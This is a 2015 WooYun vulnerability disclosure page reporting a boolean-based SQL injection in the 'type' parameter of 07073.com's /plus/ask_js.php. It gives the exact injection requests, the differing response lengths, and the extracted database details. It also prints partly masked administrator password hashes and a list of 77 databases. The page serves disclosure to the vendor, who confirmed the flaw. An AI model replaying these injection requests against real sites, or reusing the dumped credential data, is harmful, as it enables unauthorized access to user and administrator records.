当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0102702

漏洞标题:07073游戏网主站MYSQL注入可影响所有用户

相关厂商:07073.com

漏洞作者: 路人甲

提交时间:2015-03-21 10:46

修复时间:2015-05-05 10:48

公开时间:2015-05-05 10:48

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-03-21: 细节已通知厂商并且等待厂商处理中
2015-03-21: 厂商已经确认,细节仅向厂商公开
2015-03-31: 细节向核心白帽子及相关领域专家公开
2015-04-10: 细节向普通白帽子公开
2015-04-20: 细节向实习白帽子公开
2015-05-05: 细节向公众公开

简要描述:

详细说明:

www.07073.com
一处or型注入,size based

R:
GET /plus/ask_js.php?type=20856465450%20or%201&pagesize=6&tmp=ul HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US)
Accept-Language: en-us,en;q=0.8,en-us,en;q=0.5
Cache-Control: no-cache
Host: www.07073.com
P:
HTTP/1.1 200 OK
Server: nginx
Date: Fri, xx Mar 2015 xx GMT
Content-Type: text/html; charset=gb2312
Vary: Accept-Encoding
Vary: Accept-Encoding
X-Cache: MISS from xnop013-CT-FJPT-248-84.fastcdn.com
X-Cache: MISS from CT-SHHJ-190-96.fastcdn.com
Content-Length: 2304


R:
GET /plus/ask_js.php?type=20856465450%20or+0&pagesize=6&tmp=ul HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) 
Accept: */*
Accept-Language: en-us,en;q=0.8,en-us,en;q=0.5
Cache-Control: no-cache
Host: www.07073.com
P:
HTTP/1.1 200 OK
Server: nginx
Date: Fri, xx Mar 2015 xxx GMT
Content-Type: text/html; charset=gb2312
Vary: Accept-Encoding
Vary: Accept-Encoding
X-Cache: MISS from xnop013-CT-FJPT-248-84.fastcdn.com
X-Cache: MISS from CT-SHHJ-190-96.fastcdn.com
Content-Length: 69


user()='[email protected]'
version()='5.6.10-log'
database()='www07073'


ps:发现网站缓存设计有问题。
为了证明问题,这里贴几个管理员

1	0	admin	d44254f1082727xxxx	<blank>
2	0	zhangshu	2a8e55171fc68xxx	<blank>
17598496	0	xlkslbccdtks	77db0bb41dexxx	<blank>
5	0	huahuade	7c39370ab6b4de6xxx	<blank>


这里所有数据表,影响所有用户吧

available databases [77]:
[*] 123_07073
[*] acg073
[*] adv07073
[*] advertising
[*] android07073
[*] askdata
[*] atlas07073
[*] baidu_xml_dev
[*] baobei
[*] bar07073
[*] bbs073
[*] bl07073
[*] box07073
[*] cache07073
[*] cartoon
[*] coderead
[*] comment
[*] datacenter
[*] db07073
[*] db07073_tx2
[*] db07073qn
[*] dbcache
[*] discuz
[*] dn07073
[*] dnf07073
[*] downloads
[*] duandi
[*] fahao073
[*] fahao10
[*] flash07073
[*] giftcode
[*] hdtemplates
[*] hi07073
[*] huodong
[*] information_schema
[*] iphonewy_x15
[*] iphonewy_x20
[*] jft073
[*] kaifuopen_hzhks
[*] kaifuopen_zjgtqxx
[*] kc07073
[*] kf07073
[*] kf07073b
[*] kf207073
[*] kf77745
[*] list07073
[*] mesearch
[*] mh073
[*] mobilenews
[*] molihai073
[*] monitor
[*] mysql
[*] nycc
[*] other_website
[*] paihang07073
[*] performance_schema
[*] shop073
[*] sy07073
[*] team07073
[*] tongji
[*] top2011
[*] tweibo
[*] ui073
[*] wap07073
[*] webbox
[*] weixin073
[*] wenwen073
[*] wow07073
[*] www.13cr.com
[*] www07073
[*] www07073bak
[*] xuan-astd
[*] xweibo
[*] youxi
[*] zhuanchu
[*] zhuanchu2
[*] zt07073


漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-03-21 10:47

厂商回复:

感谢提供漏洞信息

最新状态:

暂无